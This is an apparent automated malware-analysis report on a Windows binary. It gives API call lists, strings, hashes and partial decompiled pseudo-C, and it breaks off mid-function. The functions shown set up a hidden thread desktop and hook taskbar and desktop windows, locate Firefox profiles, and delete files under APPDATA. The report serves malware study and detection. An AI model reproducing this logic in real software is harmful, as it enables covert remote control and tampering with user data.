0x00c68a22
0x00c68a24
0x00c68a29
0x00c68a2e
0x00c68a31
0x00c68a35
0x00c68a3a
0x00c689e4
0x00c689e4
0x00c689e4
0x00c68a40
0x00c68a4a
0x00c68a4d
0x00c68a52
0x00c68a52
0x00c68a5e
0x00c68a63
0x00c68a66
0x00c68a76
0x00c68a7b
0x00c68a89
0x00c68a90
0x00c68a93
0x00c68a99
0x00c68a9c
0x00c68aa8
0x00c68aae
0x00c68ab1
0x00c68ab3
0x00c68ab5
0x00c68ab5
0x00c68ab1
0x00c68ab7
0x00c68abf
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6893d
0x00c6893d
0x00c6893d
0x00c68944
0x00000000
0x00000000
0x00c68948
0x00c6894e
0x00c68955
0x00c68958
0x00000000
0x00000000
0x00000000
0x00c68958
0x00c6895a
0x00c6895d
0x00000000
0x00000000
0x00c6895f
0x00c68965
0x00c6896c
0x00c68972
0x00000000
0x00c68974
0x00c68974
0x00c6897a
0x00c6897f
0x00c68982
0x00c6899a
0x00c689a0
0x00c689ad
0x00c689b2
0x00c689b9
0x00c689c7
0x00c689ca
0x00c689cf
0x00c689cf
0x00000000
0x00c68982
0x00c68833
0x00c68833
0x00c68833
0x00c68b16
0x00c68b19
0x00c68b1e
0x00c68b34
0x00c68b34

APIs

GetCurrentThreadId.KERNEL32 ref: 00C687ED
GetThreadDesktop.USER32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C687F5

Part of subcall function 00C6ADF0: GetVersionExA.KERNEL32 ref: 00C6AE04

GetModuleHandleA.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6880A
GetProcAddress.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6881A
SetErrorMode.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6885B
HeapAlloc.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68875
CreateMutexA.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6889E
CreateThread.KERNEL32 ref: 00C68919
CloseHandle.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68922
Sleep.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68948
GetCurrentProcessId.KERNEL32(?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C6895F
FindWindowExA.USER32 ref: 00C6899A

Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C66
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78C7A
Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C8E
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CA2
Part of subcall function 00C78C54: FindCloseChangeNotification.KERNELBASE(?,?,?,00C78B4B), ref: 00C78CB6
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CC9
Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CDC

Strings

UxTheme.dll, xrefs: 00C68A82
SHELLDLL_DefView, xrefs: 00C689A3
Shell_TrayWnd, xrefs: 00C68A55
Program Manager, xrefs: 00C68988
NotifyIconOverflowWindow, xrefs: 00C68A6D
user32, xrefs: 00C68803
SetThemeAppProperties, xrefs: 00C68A9E
FolderView, xrefs: 00C689B2
MessageBoxTimeoutA, xrefs: 00C68813
SysListView32, xrefs: 00C689C0
Progman, xrefs: 00C68991

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$Thread$CreateCurrentFileFindUnmapView$AddressAllocChangeDesktopErrorHeapModeModuleMutexNotificationProcProcessSleepVersionWindow
String ID: FolderView$MessageBoxTimeoutA$NotifyIconOverflowWindow$Progman$Program Manager$SHELLDLL_DefView$SetThemeAppProperties$Shell_TrayWnd$SysListView32$UxTheme.dll$user32
API String ID: 3205392655-3649642972
Opcode ID: 2d7404ebe289a6869ae120fcd7dcbb8a7ef8e346a3e692494fa0a0c0e4aab62a
Instruction ID: fc222db638b2235cbc793446f7f5cf246f989ab832e65b79f0254cef194d3ee7
Opcode Fuzzy Hash: 2d7404ebe289a6869ae120fcd7dcbb8a7ef8e346a3e692494fa0a0c0e4aab62a
Instruction Fuzzy Hash: D791AF31211B4082FB25DF71E8947AD23A1FB88B94F889726DE5E17B65EF38C249C304

Uniqueness

Uniqueness Score: -1.00%

Function 00C68F68, Relevance: 51.1, APIs: 27, Strings: 2, Instructions: 303windowCOMMON

Download Yara Rule

APIs

ActivateKeyboardLayout.USER32 ref: 00C68FF2
SetKeyboardState.USER32 ref: 00C69043
GetAncestor.USER32 ref: 00C69070
PostMessageA.USER32 ref: 00C690DE
GetMenu.USER32 ref: 00C690E9
GetMenuItemCount.USER32 ref: 00C69102
GetMenuState.USER32 ref: 00C6911E
HiliteMenuItem.USER32 ref: 00C69137
MenuItemFromPoint.USER32 ref: 00C69159
GetMenuState.USER32 ref: 00C69176
EndMenu.USER32 ref: 00C69184
HiliteMenuItem.USER32 ref: 00C69199
GetSubMenu.USER32 ref: 00C691BF
GetMenuItemRect.USER32 ref: 00C691DF
TrackPopupMenuEx.USER32 ref: 00C69209
RedrawWindow.USER32 ref: 00C69266

Strings

taskmgr, xrefs: 00C69091
open, xrefs: 00C690A0

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Menu$Item$State$HiliteKeyboard$ActivateAncestorCountFromLayoutMessagePointPopupPostRectRedrawTrackWindow
String ID: open$taskmgr
API String ID: 3076619497-1543563666
Opcode ID: 9203e76cc7e01bb814064e46f6d428a048f7416013aae1f4f21e6c48c32a11ae
Instruction ID: ad495c53ecd6e429f8f97906940b1a0fe9767e68da41c1dc5d4d54f3cb4e6dc2
Opcode Fuzzy Hash: 9203e76cc7e01bb814064e46f6d428a048f7416013aae1f4f21e6c48c32a11ae
Instruction Fuzzy Hash: F3C1B171205A4086FB348F25E984BAE7764F789B84F448227DE5A47F68EF3CC64AC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DED4, Relevance: 51.0, APIs: 11, Strings: 18, Instructions: 208
threadsleepregistryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00C7DED4(void* __esi, void* __ebp, long long __rbx, char* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				int _t58;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				int _t102;
				signed int _t105;
				void* _t107;
				void* _t109;
				void* _t115;
				char* _t117;
				char* _t149;
				long long _t162;
				void* _t165;
				long _t172;
				long long _t174;

				_t165 = __r8;
				_t160 = __rbp;
				_t155 = __rdi;
				_t117 = __rcx;
				_t112 = _t162;
				 *((long long*)(_t112 + 8)) = __rbx;
				 *((long long*)(_t112 + 0x10)) = __rbp;
				 *((long long*)(_t112 + 0x18)) = __rsi;
				 *((long long*)(_t112 + 0x20)) = __rdi;
				_t158 = __rcx;
				_t5 = _t117 + 0x88; // 0x88
				_t115 = _t5;
				GetVersion();
				 *((intOrPtr*)(_t115 + 8)) = GetCurrentThreadId();
				GetThreadDesktop(_t172);
				 *((long long*)(_t115 + 0x10)) = _t112;
				if(SetThreadDesktop(??) != 0) {
					_t58 = RegisterWindowMessageA();
					_t102 = _t58;
					if(_t58 == 0) {
						goto L1;
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38)) + 0x154)) =  *((intOrPtr*)(_t115 + 0x30));
						 *( *((intOrPtr*)(__rcx + 0x38)) + 0x150) = _t102;
						_t112 =  *((intOrPtr*)(__rcx + 0x38));
						 *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x38)) + 0x164)) = 1;
						_t63 = E00C7D99C( *((intOrPtr*)(__rcx + 0x38)), _t115, _t115, __rcx, __rbp, __r9);
						_t105 = _t63;
						if(_t63 != 0) {
							goto L30;
						} else {
							_t64 = E00C7DE00(_t115, __rcx, __rdi, __rcx);
							_t105 = _t64;
							if(_t64 != 0) {
								goto L30;
							} else {
								_t65 = E00C7E5CC(_t115, _t115, _t155, __rcx);
								_t105 = _t65;
								if(_t65 != 0) {
									goto L30;
								} else {
									_t125 =  *((intOrPtr*)(_t158 + 0x38));
									_t109 = 0;
									 *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x38)) + 0x16c)) =  *((intOrPtr*)(_t115 + 0x28));
									while(1) {
										_t112 =  *((intOrPtr*)(_t158 + 0x38));
										_t174 =  *((intOrPtr*)(_t112 + 0x130));
										if(_t174 != 0) {
											break;
										}
										Sleep();
										_t109 = _t109 + 1;
										if(_t109 < 0xc8) {
											continue;
										} else {
											_t105 = _t105 | 0xffffffff;
											goto L30;
										}
										goto L31;
									}
									GetDesktopWindow();
									_t107 = 0;
									 *((long long*)(_t115 + 0x58)) = _t174;
									 *((long long*)(_t115 + 0x50)) = _t112;
									if( *((intOrPtr*)(_t115 + 0x60)) == _t158) {
										while(_t107 < 0xa) {
											r8d = 0;
											E00C7B940(_t112, _t115, _t125, "Shell_TrayWnd", _t158, _t160, _t165);
											 *((long long*)(_t115 + 0x60)) = _t112;
											if(_t112 == 0) {
												Sleep();
											}
											_t107 = _t107 + 1;
											if( *((long long*)(_t115 + 0x60)) == 0) {
												continue;
											}
											goto L15;
										}
									}
									L15:
									r8d = 0;
									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x60)), "ReBarWindow32", _t158, _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0x70)) = _t112;
									E00C7B940(_t112, _t115, _t112, "MSTaskSwWClass", _t158, _t160, _t165);
									_t158 = "ToolbarWindow32";
									 *((long long*)(_t115 + 0x68)) = _t112;
									r8d = 0;
									E00C7B940(_t112, _t115, _t112, "ToolbarWindow32", "ToolbarWindow32", _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0x78)) = _t112;
									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x68)), "MSTaskListWClass", "ToolbarWindow32", _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0x80)) = _t112;
									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x60)), "TrayNotifyWnd", "ToolbarWindow32", _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0x98)) = _t112;
									E00C7B940(_t112, _t115, _t112, _t158, _t158, _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0xc0)) = _t112;
									E00C7B940(_t112, _t115,  *((intOrPtr*)(_t115 + 0x98)), "SysPager", _t158, _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0xa0)) = _t112;
									E00C7B940(_t112, _t115, _t112, _t158, _t158, _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0xb0)) = _t112;
									E00C7B940(_t112, _t115, _t112, "NotifyIconOverflowWindow", _t158, _t160, _t165);
									r8d = 0;
									 *((long long*)(_t115 + 0xa8)) = _t112;
									_t134 = _t112;
									E00C7B940(_t112, _t115, _t112, _t158, _t158, _t160, _t165);
									 *((long long*)(_t115 + 0xb8)) = _t112;
									if(E00C6ADD8() > 5) {
										if(E00C6ADD8() != 6 || E00C6ADE0() != 0) {
											if(E00C6ADD8() != 6 || E00C6ADE0() != 1) {
												if(E00C6ADD8() > 6 || E00C6ADD8() == 6 && E00C6ADE0() > 1) {
													_t134 =  *((intOrPtr*)(_t115 + 0x60));
													_t149 = "Start";
													goto L26;
												}
											} else {
												goto L21;
											}
										} else {
											L21:
											_t149 = "Button";
											L26:
											E00C7B940(_t112, _t115, _t134, _t149, _t158, _t160, "Start");
											goto L27;
										}
									} else {
										_t134 =  *((intOrPtr*)(_t115 + 0x60));
										GetWindow(??, ??);
										L27:
										 *((long long*)(_t115 + 0x40)) = _t112;
									}
									E00C7B940(_t112, _t115, _t134, "DV2ControlHost", _t158, _t160, "Start menu");
									 *((long long*)(_t115 + 0x48)) = _t112;
									E00C7B940(_t112, _t115, _t134, "Progman", _t158, _t160, "Program Manager");
									r8d = 0;
									 *((long long*)(_t115 + 0x38)) = _t112;
									E00C7B940(_t112, _t115, _t112, "SHELLDLL_DefView", _t158, _t160, "Program Manager");
									 *((long long*)(_t115 + 0x90)) = _t112;
									E00C7B940(_t112, _t115, _t112, "SysListView32", _t158, _t160, "FolderView");
									r8d = 0;
									 *((long long*)(_t115 + 0x88)) = _t112;
									SendMessageA(??, ??, ??, ??);
									goto L29;
								}
							}
						}
					}
				} else {
					L1:
					_t105 = GetLastError();
					L29:
					if(_t105 != 0) {
						L30:
						E00C7E3D4(_t112, _t115, _t115, _t158, _t160);
					}
				}
				L31:
				return _t105;
			}

0x00c7ded4
0x00c7ded4
0x00c7ded4
0x00c7ded4
0x00c7ded4
0x00c7ded7
0x00c7dedb
0x00c7dedf
0x00c7dee3
0x00c7deed
0x00c7def0
0x00c7def0
0x00c7def7
0x00c7df05
0x00c7df08
0x00c7df11
0x00c7df1d
0x00c7df33
0x00c7df39
0x00c7df3d
0x00000000
0x00c7df3f
0x00c7df46
0x00c7df53
0x00c7df59
0x00c7df5d
0x00c7df67
0x00c7df6c
0x00c7df70
0x00000000
0x00c7df76
0x00c7df79
0x00c7df7e
0x00c7df82
0x00000000
0x00c7df88
0x00c7df8b
0x00c7df90
0x00c7df94
0x00000000
0x00c7df9a
0x00c7df9a
0x00c7df9e
0x00c7dfa3
0x00c7dfa9
0x00c7dfa9
0x00c7dfad
0x00c7dfb7
0x00000000
0x00000000
0x00c7dfbd
0x00c7dfc3
0x00c7dfcb
0x00000000
0x00c7dfcd
0x00c7dfcd
0x00000000
0x00c7dfcd
0x00000000
0x00c7dfcb
0x00c7dfd5
0x00c7dfdb
0x00c7dfdd
0x00c7dfe1
0x00c7dfe9
0x00c7dfeb
0x00c7dff0
0x00c7dffc
0x00c7e001
0x00c7e008
0x00c7e00d
0x00c7e00d
0x00c7e013
0x00c7e01a
0x00000000
0x00000000
0x00000000
0x00c7e01a
0x00c7dfeb
0x00c7e01c
0x00c7e027
0x00c7e02a
0x00c7e02f
0x00c7e032
0x00c7e040
0x00c7e045
0x00c7e04c
0x00c7e053
0x00c7e059
0x00c7e069
0x00c7e06c
0x00c7e070
0x00c7e080
0x00c7e083
0x00c7e08a
0x00c7e08f
0x00c7e092
0x00c7e09f
0x00c7e0b2
0x00c7e0b5
0x00c7e0bc
0x00c7e0c1
0x00c7e0c4
0x00c7e0d1
0x00c7e0d6
0x00c7e0d9
0x00c7e0e9
0x00c7e0ee
0x00c7e0f1
0x00c7e0fb
0x00c7e0fe
0x00c7e103
0x00c7e116
0x00c7e12c
0x00c7e13f
0x00c7e15e
0x00c7e174
0x00c7e178
0x00000000
0x00c7e178
0x00000000
0x00000000
0x00000000
0x00c7e14b
0x00c7e14b
0x00c7e14b
0x00c7e17f
0x00c7e186
0x00000000
0x00c7e186
0x00c7e118
0x00c7e118
0x00c7e11c
0x00c7e18b
0x00c7e18b
0x00c7e18b
0x00c7e19f
0x00c7e1ab
0x00c7e1b8
0x00c7e1bd
0x00c7e1c0
0x00c7e1ce
0x00c7e1da
0x00c7e1eb
0x00c7e1f0
0x00c7e1f3
0x00c7e208
0x00000000
0x00c7e208
0x00c7df94
0x00c7df82
0x00c7df70
0x00c7df1f
0x00c7df1f
0x00c7df25
0x00c7e20e
0x00c7e210
0x00c7e212
0x00c7e215
0x00c7e215
0x00c7e210
0x00c7e21a
0x00c7e236

APIs

GetVersion.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DEF7
GetCurrentThreadId.KERNEL32 ref: 00C7DEFD
GetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF08
SetThreadDesktop.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF15
GetLastError.KERNEL32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF1F
RegisterWindowMessageA.USER32(?,?,?,00C7F855,?,?,?,00C6C267), ref: 00C7DF33
Sleep.KERNEL32 ref: 00C7DFBD

Strings

NotifyIconOverflowWindow, xrefs: 00C7E0E0
TrayNotifyWnd, xrefs: 00C7E079
Start, xrefs: 00C7E178, 00C7E17F
MSTaskSwWClass, xrefs: 00C7E036
Progman, xrefs: 00C7E1AF
VisualEffects, xrefs: 00C7E1FA
ToolbarWindow32, xrefs: 00C7E045
SHELLDLL_DefView, xrefs: 00C7E1C4
Shell_TrayWnd, xrefs: 00C7DFF3
Program Manager, xrefs: 00C7E1A4
ReBarWindow32, xrefs: 00C7E020
FolderView, xrefs: 00C7E1D3
Start menu, xrefs: 00C7E18F
SysPager, xrefs: 00C7E0AB
Button, xrefs: 00C7E14B
MSTaskListWClass, xrefs: 00C7E062
DV2ControlHost, xrefs: 00C7E198
SysListView32, xrefs: 00C7E1E1

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Thread$Desktop$CurrentErrorLastMessageRegisterSleepVersionWindow
String ID: Button$DV2ControlHost$FolderView$MSTaskListWClass$MSTaskSwWClass$NotifyIconOverflowWindow$Progman$Program Manager$ReBarWindow32$SHELLDLL_DefView$Shell_TrayWnd$Start$Start menu$SysListView32$SysPager$ToolbarWindow32$TrayNotifyWnd$VisualEffects
API String ID: 3572586140-3030675435
Opcode ID: d61ba950d70bb93267557f5b4cbba4dfd0d860f9a03f3fb5fe1ec5f43cbb9291
Instruction ID: 41d6122436df8a66f7875c229a56215bcce2c501c4e2a15b3f43f46fae0dd045
Opcode Fuzzy Hash: d61ba950d70bb93267557f5b4cbba4dfd0d860f9a03f3fb5fe1ec5f43cbb9291
Instruction Fuzzy Hash: 0F91C132200B4582EB60EF75E851B6E33B4FB49B94F84D226DA5E87B25EF34C905D740

Uniqueness

Uniqueness Score: -1.00%

Function 00C76984, Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178memorystringfileCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00C769CC
lstrlenW.KERNEL32 ref: 00C769D5
HeapAlloc.KERNEL32 ref: 00C769EC
SetLastError.KERNEL32 ref: 00C769FD
lstrcpyW.KERNEL32 ref: 00C76A0E
lstrcatW.KERNEL32 ref: 00C76A1E
CreateFileW.KERNEL32 ref: 00C76A48
HeapAlloc.KERNEL32 ref: 00C76A74
lstrcpyW.KERNEL32 ref: 00C76A8C
HeapFree.KERNEL32 ref: 00C76C34

Strings

Profiles\Default, xrefs: 00C76A82
[Profile, xrefs: 00C76AD4
Path=, xrefs: 00C76B12
\profiles.ini, xrefs: 00C76A14
IsRelative=1, xrefs: 00C76BCB
Default=1, xrefs: 00C76BA5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$AllocErrorLastlstrcpy$CreateFileFreelstrcatlstrlen
String ID: Default=1$IsRelative=1$Path=$Profiles\Default$[Profile$\profiles.ini
API String ID: 732051534-3061325931
Opcode ID: 0acd494f8dac8503174c5e554d38c4eb6b97113f5b6dcbfd90fd0e27c0ffac4f
Instruction ID: 554bc38d74270b9c88b41ee638dbfce99d31b7844f201f192e4b138fdc8e159d
Opcode Fuzzy Hash: 0acd494f8dac8503174c5e554d38c4eb6b97113f5b6dcbfd90fd0e27c0ffac4f
Instruction Fuzzy Hash: 5271BD71304F8186FB259F12E858B6A77A0F785FA4F90C225DE5A43B64EF38C949DB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C7FDA0, Relevance: 45.6, APIs: 25, Strings: 1, Instructions: 120stringfilememoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C7FDCE
lstrlenW.KERNEL32 ref: 00C7FDD6
lstrlenW.KERNEL32 ref: 00C7FDE1
HeapAlloc.KERNEL32 ref: 00C7FE01
lstrcpyW.KERNEL32 ref: 00C7FE19
lstrcatW.KERNEL32 ref: 00C7FE29
lstrcatW.KERNEL32 ref: 00C7FE35
memset.NTDLL ref: 00C7FE45
FindFirstFileW.KERNEL32 ref: 00C7FE52
lstrcmpW.KERNEL32 ref: 00C7FE73
lstrcmpW.KERNEL32 ref: 00C7FE8D
lstrcpyW.KERNEL32 ref: 00C7FEA4
lstrcatW.KERNEL32 ref: 00C7FEB4
lstrcatW.KERNEL32 ref: 00C7FEC2
lstrcpyW.KERNEL32 ref: 00C7FEDF
lstrcatW.KERNEL32 ref: 00C7FEEF
lstrcatW.KERNEL32 ref: 00C7FEFD
DeleteFileW.KERNEL32 ref: 00C7FF06
FindNextFileW.KERNEL32 ref: 00C7FF1A
FindClose.KERNEL32 ref: 00C7FF2B
lstrcpyW.KERNEL32 ref: 00C7FF37
lstrcatW.KERNEL32 ref: 00C7FF47
lstrcatW.KERNEL32 ref: 00C7FF58
memset.NTDLL ref: 00C7FF6B
RemoveDirectoryW.KERNEL32 ref: 00C7FF85

Strings

APPDATA, xrefs: 00C7FDAF

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpy$FileFindmemset$lstrcmplstrlen$AllocCloseDeleteDirectoryFirstHeapNextRemove
String ID: APPDATA
API String ID: 3722983715-4054820676
Opcode ID: 3fc75f5bd2c91e8a3378cc6400bdff6dc861c94856ddef82e46a99bd0fd89bf9
Instruction ID: 702ce0417040c0dd50a0a2b93f22c54ada0ea28d9141830a43ecc4effbea0420
Opcode Fuzzy Hash: 3fc75f5bd2c91e8a3378cc6400bdff6dc861c94856ddef82e46a99bd0fd89bf9
Instruction Fuzzy Hash: C6514765300A4182FA249F26FC987696361BB89FE5F84D229DD5B07AA4DF3CC50AC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C803EC, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 236memorynativestringCOMMON

Download Yara Rule

APIs

GetProcessId.KERNEL32 ref: 00C8040C
lstrlenW.KERNEL32 ref: 00C80437
HeapAlloc.KERNEL32 ref: 00C8044F
NtQuerySystemInformation.NTDLL ref: 00C804AB
GetCurrentProcess.KERNEL32 ref: 00C804D5
DuplicateHandle.KERNEL32 ref: 00C80501
NtQueryObject.NTDLL ref: 00C80526
CloseHandle.KERNEL32 ref: 00C806F9
HeapFree.KERNEL32 ref: 00C8071C
HeapFree.KERNEL32 ref: 00C80733
HeapFree.KERNEL32 ref: 00C80745

Strings

File, xrefs: 00C8060A

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Heap$Free$HandleProcessQuery$AllocCloseCurrentDuplicateInformationObjectSystemlstrlen
String ID: File
API String ID: 2333355087-749574446
Opcode ID: 7e8f9e3fdc403fc15fd581c76d1a16a9ad3c1adb65e1c94705dd3fa945da94a0
Instruction ID: 235ca3140af89dde7aef2b5417356745ba7346731579a8a8404c51e55249dec7
Opcode Fuzzy Hash: 7e8f9e3fdc403fc15fd581c76d1a16a9ad3c1adb65e1c94705dd3fa945da94a0
Instruction Fuzzy Hash: 85A15E36701B419AFB54DF76E844BA937A1B788F98F5481259E0A53B28EF38C54EC708

Uniqueness

Uniqueness Score: -1.00%

Function 00C809D4, Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 422
windowtimethreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E00C809D4(void* __esi, void* __ebp, void* __eflags, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdx, signed long long __r8, signed long long __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t87;
				signed int _t94;
				long _t97;
				long _t104;
				signed int _t113;
				signed int _t115;
				long _t117;
				signed short _t120;
				signed int _t124;
				signed short _t126;
				signed short _t137;
				void* _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				void* _t181;
				signed long long _t202;
				signed long long _t204;
				intOrPtr _t206;
				signed long long _t214;
				void* _t237;
				void* _t249;
				signed long long _t250;
				signed long long _t255;
				signed long long _t256;
				signed long long _t261;
				signed long long _t264;
				void* _t267;
				void* _t269;
				void* _t270;
				signed long long _t272;
				signed long long _t277;
				signed long long _t285;
				signed long long _t288;
				signed long long _t289;
				void* _t291;
				struct HWND__* _t294;
				void* _t295;
				intOrPtr _t296;

				_t277 = __r9;
				_t272 = __r8;
				_t204 = __rbx;
				_t202 = __rax;
				 *((long long*)(_t269 + 0x10)) = __rbx;
				 *((long long*)(_t269 + 0x20)) = __r9;
				_t267 = _t269 - 7;
				_t270 = _t269 - 0xd0;
				_t261 = __rdx;
				_t264 = __rcx;
				_t285 = __r8;
				GetAncestor(_t294);
				_t295 = __rcx + 0x88;
				 *(_t267 + 0x47) = __rax;
				E00C7BA38(__eflags, __rax, __rbx, _t295, __rax, __rcx, __r8, __r9, _t291);
				r14d = 0;
				_t288 = _t202;
				_t87 = E00C7BF60(_t202, __rdx);
				_t6 = _t204 + 1; // 0x1
				_t142 = _t6;
				if(_t87 != 0) {
					 *(_t267 + 0x47) = _t261;
					r14d = _t142;
				}
				_t137 =  *(_t267 + 0x6f);
				_t143 = 0x49;
				_t88 = _t204 - 0x201;
				_t181 = _t204 - 0x201 - 6;
				if(_t181 > 0) {
					L33:
					_t289 =  *(_t267 + 0x47);
					L34:
					E00C7B6C4(_t204, _t264, _t261, _t264);
					r8d = 0x80;
					_t249 = _t267 - 0x79;
					GetClassNameA(??, ??, ??);
					r12d =  *(_t267 + 0x67) & 0x0000ffff;
					_t273 = _t261;
					r9d = _t137 & 0x0000ffff;
					PostMessageA(??, ??, ??, ??);
					_t214 = _t264;
					if( *(_t267 + 0x67) != 1) {
						_t296 =  *((intOrPtr*)(_t267 + 0x87));
						_t250 = _t261;
						r8d =  *(_t267 + 0x77);
						_t280 = _t296;
						_t138 = E00C78DE0(_t204, _t214, _t250, _t264, _t267, _t296);
						_t149 = 0xffff;
						_t94 =  *(_t267 + 0x67) & 0x0000ffff;
						__eflags = _t94 - 8;
						if(__eflags > 0) {
							__eflags = _t94 - 9;
							if(__eflags == 0) {
								__eflags = _t138 - 0xa2;
								if(_t138 != 0xa2) {
									__eflags = _t138 - 0xa5;
									if(_t138 != 0xa5) {
										L71:
										__eflags =  *(_t267 + 0x6f) + 0xfffffdff - 6;
										if(__eflags <= 0) {
											asm("bt ecx, eax");
											if(__eflags < 0) {
												E00C7C170(__eflags, _t202, _t204, _t264, _t289, _t264, _t267, _t273, _t280);
											}
										}
										L74:
										_t97 = E00C7B908(_t264);
										L75:
										return _t97;
									}
									_t139 = 0xffff;
									__eflags = r14d;
									if(r14d != 0) {
										L68:
										_t273 = _t261;
										L69:
										_t280 = _t296;
										L70:
										PostMessageA();
										goto L71;
									}
									L107:
									GetAncestor();
									_t261 = _t202;
									_t149 = 0xffff;
									L56:
									__eflags = _t139;
									if(_t139 == 0) {
										goto L71;
									}
									__eflags = _t139 - _t149;
									if(_t139 == _t149) {
										goto L68;
									}
									L58:
									r8d = _t139 & 0x0000ffff;
									goto L69;
								}
								_t202 =  *((intOrPtr*)(_t267 + 0x5f));
								asm("sbb cx, cx");
								_t139 = _t214 + 0xf030;
								__eflags = r14d;
								if(r14d != 0) {
									goto L56;
								}
								goto L107;
							}
							if(__eflags <= 0) {
								L45:
								_t273 = _t285;
								goto L69;
							}
							__eflags = _t94 - 0x11;
